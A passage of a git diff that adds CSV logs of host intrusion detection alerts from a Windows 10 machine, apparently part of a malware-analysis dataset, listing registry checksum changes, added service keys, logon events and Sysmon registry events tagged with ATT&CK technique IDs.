'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 4, 2020 @ 12:28:49.867",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:49.851",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:49.319",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:49.304",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:47.416",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:47.403",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a0e1\Security' was added. 
+" +"Apr 4, 2020 @ 12:28:44.632",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '8d9ddf4cd30cb1f7e5ac293f30aecda3' +New md5sum is : 'a34f50b409ff791b8ca73db3b1ca0733' +Old sha1sum was: 'dff2cd5fdb172279d12d40cd687230eba840bace' +New sha1sum is : 'ef5248efe24d4437def466d2cef3295c26f57ead' +" +"Apr 4, 2020 @ 12:28:43.364",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '56e9f0a7add3da7f007b812f71fed075' +New md5sum is : '1e6e38e0129cb1178036ce2d2de63896' +Old sha1sum was: 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +New sha1sum is : 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +" +"Apr 4, 2020 @ 12:28:43.044",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '3ee67f24b1bf3a60668b6b9b7ceb57db' +New md5sum is : '9899f0d851a544118a1df10180c84633' +Old sha1sum was: '2c7378d3b213a72ef12d4a556bce6bdcc0354b44' +New sha1sum is : '495d124fb9a33489fca070669c53f629787f537f' +" +"Apr 4, 2020 @ 12:28:42.012",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: '5b2ea53198ac98428f3237ad2688a712' +New md5sum is : '59b12546060e1abacf07181ecdab1088' +Old sha1sum was: '4b6855e7d75db3d7382571a292c5590fa9c45d1b' +New sha1sum is : 'd4b00ea9b57b4fa8d52f007174e8a4fa9c806927' +" +"Apr 4, 2020 @ 12:28:41.895",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:41.872",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a0e1\TriggerInfo\0' was added. 
+" +"Apr 4, 2020 @ 12:28:41.856",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:35.294",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: '4f5d0a4201320eacd047d993b51c860c' +New md5sum is : 'ae2d280bcb1d70c8d8c9440f99e7346f' +Old sha1sum was: 'ebc1c34aea8b5ff39cdf566769ab687e8678327b' +New sha1sum is : '5e5d8fc3198d01bfeb0b40c7b5b2377aa397ca0b' +" +"Apr 4, 2020 @ 12:28:34.031",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '8d9ddf4cd30cb1f7e5ac293f30aecda3' +New md5sum is : 'a34f50b409ff791b8ca73db3b1ca0733' +Old sha1sum was: 'dff2cd5fdb172279d12d40cd687230eba840bace' +New sha1sum is : 'ef5248efe24d4437def466d2cef3295c26f57ead' +" +"Apr 4, 2020 @ 12:28:31.465",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'ba932c9bc52c8941758880d70e805a03' +New md5sum is : 'e539e5588ade4fc950140b672a9b4a8e' +Old sha1sum was: '4c54a5c3e5e976d942eb6e92aa7a0dbf29d3da53' +New sha1sum is : '5aff67900ed86033e13fa95ee5d8cddc4bf716f6' +" +"Apr 4, 2020 @ 12:28:30.747",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '8d9ddf4cd30cb1f7e5ac293f30aecda3' +New md5sum is : 'a34f50b409ff791b8ca73db3b1ca0733' +Old sha1sum was: 'dff2cd5fdb172279d12d40cd687230eba840bace' +New sha1sum is : 'ef5248efe24d4437def466d2cef3295c26f57ead' +" +"Apr 4, 2020 @ 12:28:29.903",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. 
+Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 4, 2020 @ 12:28:29.419",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:28:22.273",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'c49bd58f7203d1a7b354bbe1c57a8688' +New md5sum is : 'e8b3d7e25b8fb5dd2b186e056006ffd4' +Old sha1sum was: 'cac279660d22f6ed20f11905612284759bf29722' +New sha1sum is : 'b321fb7cfcf165737c087395491ecb8c386e9010' +" +"Apr 4, 2020 @ 12:28:14.746",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DsmSvc\State' checksum changed. +Old md5sum was: '760a4bada178d4343aea42eba0843c6c' +New md5sum is : '63455c20cde548e288f8dba9a00dd33b' +Old sha1sum was: '52d66aacb149b05f27bc68ebecd67c04e65c70a2' +New sha1sum is : '28420a387fa959459932089a9494e96fcc914797' +" +"Apr 4, 2020 @ 12:28:14.090",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '6bf6c77f49d9c3e29dd6dd026f712498' +New md5sum is : '5d59f40e382b0bd5741c31b20dc9877d' +Old sha1sum was: 'cee2e4f252e785a4923147e41cbe4da500294572' +New sha1sum is : '35a4b6689f4c1e64b1097375ed53f30de17c00da' +" +"Apr 4, 2020 @ 12:28:12.809",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:12.778",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:12.683",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a0e1' was added. 
+" +"Apr 4, 2020 @ 12:28:12.668",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:12.419",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:12.390",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:11.746",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:11.715",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:11.512",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:11.481",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:11.356",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'd0b31528150e0bcaaf1ca31e909625ae' +New md5sum is : 'f831bbb4b4e3aa71d36063136978431b' +Old sha1sum was: '4ac9c45fb8b59e455e5cffb095693fd8ba73e2e9' +New sha1sum is : 'fb7819f8ec0c6d77e1fe97dbacc01e76e3e5be86' +" +"Apr 4, 2020 @ 12:28:10.043",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:10.027",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a0e1\Security' was added. 
+" +"Apr 4, 2020 @ 12:28:09.887",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:09.871",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:09.792",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:09.777",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:07.684",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:07.668",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 12:28:07.637",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 12:28:07.606",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 12:28:07.590",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 12:28:07.559",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 12:28:07.543",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1\Security' was added. 
+" +"Apr 4, 2020 @ 12:28:06.777",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:06.763",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:06.355",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: 'fbc1bc27f7b282bbde5c96220cd80867' +New md5sum is : '0fbd85d390c648f73d243e459fc4c439' +Old sha1sum was: '541f116913d701780efcca644fb357aefa18d06d' +New sha1sum is : '4cfcff84f3698f6a858f7a5799d31fc7d81426df' +" +"Apr 4, 2020 @ 12:28:06.339",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '5f41249c6834324a3bed00165f484028' +New md5sum is : 'd27ed1a432d89e8be52f17c1744a38bc' +Old sha1sum was: '55652eae98a769000c026ec4085931d715e9da75' +New sha1sum is : 'f5193efad00e671e9802d94baecb86989890a7f3' +" +"Apr 4, 2020 @ 12:28:06.293",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '7b41abc45e1ece0b0fcc347b8152d56c' +New md5sum is : '96524085ad01638d29a94ea6811680f0' +Old sha1sum was: 'efffeaf67a57d9ae08afe3825068527d6aa3bffd' +New sha1sum is : 'd60d212b81c6fa16646c5fc9724e1eb7edba2639' +" +"Apr 4, 2020 @ 12:28:03.965",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:03.949",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a0e1\Security' was added. 
+" +"Apr 4, 2020 @ 12:27:57.778",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:27:08.681",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 12:26:50.547",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:26:41.445",3,"Windows User Logoff", +"Apr 4, 2020 @ 12:26:41.429",3,"Windows User Logoff", +"Apr 4, 2020 @ 12:26:41.398",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 12:26:41.383",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 12:26:35.987",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 12:26:33.187",3,"The Windows Search Service started", +"Apr 4, 2020 @ 12:26:33.013",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:26:32.961",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:26:32.727",3,"The database engine attached a database", +"Apr 4, 2020 @ 12:26:32.487",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 12:26:29.781",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:26:29.714",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 12:26:29.504",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 12:26:29.480",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 12:26:28.415",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 4, 2020 @ 12:26:27.068",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." 
+"Apr 4, 2020 @ 12:25:51.802",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 12:25:51.779",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 12:25:49.339",5,"Windows System error event", +"Apr 4, 2020 @ 12:25:49.292",5,"Windows System error event", +"Apr 4, 2020 @ 12:24:37.133",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:24:32.619",3,"Service startup type was changed", +"Apr 4, 2020 @ 12:24:15.207",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 12:22:50.724",3,"Service startup type was changed", +"Apr 4, 2020 @ 12:21:11.319",5,"Windows System error event", +"Apr 4, 2020 @ 12:21:06.319",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:21:06.258",4,"Summary event of the report's signatures", +"Apr 4, 2020 @ 12:21:05.398",4,"Summary event of the report's signatures", +"Apr 4, 2020 @ 12:20:44.647",3,"Service startup type was changed", +"Apr 4, 2020 @ 12:20:43.179",3,"The database engine attached a database", +"Apr 4, 2020 @ 12:20:43.096",3,"The database engine has completed recovery steps", +"Apr 4, 2020 @ 12:20:43.038",3,"The database engine is replaying log file C:\Winnt\system32\wins\j50.log", +"Apr 4, 2020 @ 12:20:43.009",3,"The database engine is initiating recovery steps", +"Apr 4, 2020 @ 12:20:42.987",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 12:20:36.866",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:20:35.696",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:20:35.663",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:20:29.882",3,"Windows User Logoff", +"Apr 4, 2020 @ 12:20:29.835",3,"IIS NetworkCleartext Logon Success", +"Apr 4, 2020 @ 12:20:25.991",3,"Windows User Logoff", +"Apr 4, 2020 @ 12:20:25.961",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:20:25.897",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:18:15.967",3,"Windows Logon Success", diff --git a/data/MW_1_HIDS_2.csv b/data/MW_1_HIDS_2.csv new file mode 100644 index 0000000..cbd182f --- /dev/null 
+++ b/data/MW_1_HIDS_2.csv 
@@ -0,0 +1,2041 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 24, 2020 @ 11:07:08.840",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:07:05.652476900Z"",""eventRecordID"":""1560"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:07:05.651\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath\r\nDetails: \""C:\\Program Files (x86)\\Google\\Chrome\\Application\\81.0.4044.122\\elevation_service.exe\""\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:07:05.651"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\ImagePath"",""details"":""\\\""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\81.0.4044.122\\\\elevation_service.exe\\\""""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:07:05.651 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath +Details: ""C:\Program Files 
(x86)\Google\Chrome\Application\81.0.4044.122\elevation_service.exe""""" +"Apr 24, 2020 @ 11:07:08.823",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:07:05.651378400Z"",""eventRecordID"":""1559"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:07:05.636\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:07:05.636"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:07:05.636 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:06:39.150",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '3f386f86526122f9896850ebf052d0e5' +New md5sum is : '4ca3775364adef8c8a16cf0912829686' +Old sha1sum was: '893e8a5eed791b28b06ba9456666d04f449facaf' +New sha1sum is : '07df8ca66d9d24734ea5b6b5956d0f113a793ce5' +", +"Apr 24, 2020 @ 11:06:18.188",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T11:01:16Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 11:06:08.332",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. 
+ +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:05:08.190",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 24, 2020 @ 11:05:05.784",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T11:01:03Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 11:05:03.315",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 24, 2020 @ 11:04:52.908",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 11:04:08.454",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. 
+Old md5sum was: '47f9a8fc035cc80b23dfd8be4d23cda6' +New md5sum is : 'f4dbc0a0d5da7918ee74f20700fe9e9b' +Old sha1sum was: '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +New sha1sum is : '0065a10df965ceb8831b3eaf1af7c2eb6963f5de' +", +"Apr 24, 2020 @ 11:04:08.423",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '480a7b1436febced63b663e198db057e' +New md5sum is : '69718c4c9cb918d97834f2e3eebad7ce' +Old sha1sum was: 'a366c53c7d877bd13ac0386830dbad1b52127af9' +New sha1sum is : 'bc449125554f1a36c132e525051e343b065c06c7' +", +"Apr 24, 2020 @ 11:04:04.832",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_376ac' was added. +", +"Apr 24, 2020 @ 11:04:04.829",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:04:03.274",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:04:02.751",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. 
